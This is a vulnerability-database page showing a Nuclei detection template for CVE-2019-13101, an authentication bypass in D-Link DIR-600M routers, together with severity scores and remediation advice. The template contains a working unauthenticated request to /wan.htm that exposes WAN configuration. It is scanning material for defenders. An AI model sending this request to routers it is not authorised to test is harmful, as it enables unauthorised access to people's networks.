Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-13101
HistoryJul 03, 2021 - 12:20 a.m.

D-Link DIR-600M - Authentication Bypass

2021-07-0300:20:40
ProjectDiscovery
github.com
7

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.064 Low

EPSS

Percentile

93.7%

D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.

id: CVE-2019-13101

info:
  name: D-Link DIR-600M - Authentication Bypass
  author: Suman_Kar
  severity: critical
  description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
  remediation: |
    Update the router's firmware to the latest version provided by D-Link.
  reference:
    - https://github.com/d0x0/D-Link-DIR-600M
    - https://www.exploit-db.com/exploits/47250
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
    - https://us.dlink.com/en/security-advisory
    - http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-13101
    cwe-id: CWE-306
    epss-score: 0.06909
    epss-percentile: 0.93911
    cpe: cpe:2.3:h:dlink:dir-600m:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-600m
  tags: cve2019,cve,packetstorm,edb,dlink,router,iot

http:
  - raw:
      - |
        GET /wan.htm HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/PPPoE/"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022040244b26f38b4723a5f287f4e19182192fcb3046cd463b121034364d816363ba022100fb713221642e83baa1c7d5a9363ca18592ac5739a6d1297e4f3c4b6508f34200:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.064 Low

EPSS

Percentile

93.7%